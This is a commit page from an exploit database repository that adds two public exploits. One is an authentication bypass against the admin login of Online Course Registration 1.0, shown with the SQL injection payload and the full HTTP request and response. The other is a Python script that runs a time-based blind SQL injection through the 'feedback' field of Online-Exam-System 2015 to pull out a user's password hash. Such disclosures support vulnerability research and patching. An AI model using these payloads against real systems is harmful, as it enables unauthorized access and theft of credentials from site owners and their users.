DB: 2020-06-06
2 changes to exploits/shellcodes Online Course Registration 1.0 - Authentication Bypass Online-Exam-System 2015 - 'feedback' SQL Injection
This commit is contained in:
parent
533f33f3f4
commit
d0531a5e12
3 changed files with 76 additions and 0 deletions
40
exploits/php/webapps/48559.txt
Normal file
40
exploits/php/webapps/48559.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
# Exploit Title: Online Course Registration 1.0 - Authentication Bypass
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-06-05
|
||||
# Exploit Author: BKpatron
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
|
||||
# Version: v1.0
|
||||
# Tested on: Win 10
|
||||
# CVE: N/A
|
||||
# my website: bkpatron.com
|
||||
|
||||
# Vulnerability: Attacker can bypass login page and access to dashboard page
|
||||
# vulnerable file : admin/index.php
|
||||
# Parameter & Payload: '=''or'
|
||||
# Proof of Concept:
|
||||
|
||||
http://localhost/Online%20Course%20Registration/admin/index.php
|
||||
|
||||
POST /Online%20Course%20Registration/admin/index.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 61
|
||||
Referer: http://localhost/Online%20Course%20Registration/admin/index.php
|
||||
Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
|
||||
|
||||
HTTP/1.1 302 Found
|
||||
Date: Thu, 04 Jun 2020 20:04:27 GMT
|
||||
Server: Apache/2.4.39 (Win64) PHP/7.3.5
|
||||
X-Powered-By: PHP/7.3.5
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate
|
||||
Pragma: no-cache
|
||||
location: http://localhost/Online Course Registration/admin/change-password.php
|
34
exploits/php/webapps/48560.py
Executable file
34
exploits/php/webapps/48560.py
Executable file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection
|
||||
# Date: 2020-06-04
|
||||
# Exploit Author: Gus Ralph
|
||||
# Vendor Homepage: https://github.com/sunnygkp10/
|
||||
# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
|
||||
# Affected Version: 2015
|
||||
# Tested on: Ubuntu
|
||||
# CVE : N/A
|
||||
|
||||
import requests, string, time
|
||||
from sys import stdout
|
||||
|
||||
URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n")
|
||||
|
||||
payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^"
|
||||
payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -"
|
||||
so_far = hash = ""
|
||||
while True:
|
||||
for i in string.digits + string.ascii_lowercase:
|
||||
so_far = hash + i
|
||||
payload_to_send = payload + str(so_far) + payload2
|
||||
data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send}
|
||||
start = time.time()
|
||||
r = requests.post(URL + "feed.php", data = data)
|
||||
request_time = time.time() - start
|
||||
if request_time > 5:
|
||||
hash += i
|
||||
stdout.write(i)
|
||||
stdout.flush()
|
||||
break
|
||||
if len(hash) > 31:
|
||||
stdout.write("\n")
|
||||
print "Hash found: " + hash
|
||||
break
|
|
@ -42785,3 +42785,5 @@ id,file,description,date,author,type,platform,port
|
|||
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
|
||||
48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
|
||||
48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
|
||||
48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php,
|
||||
48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue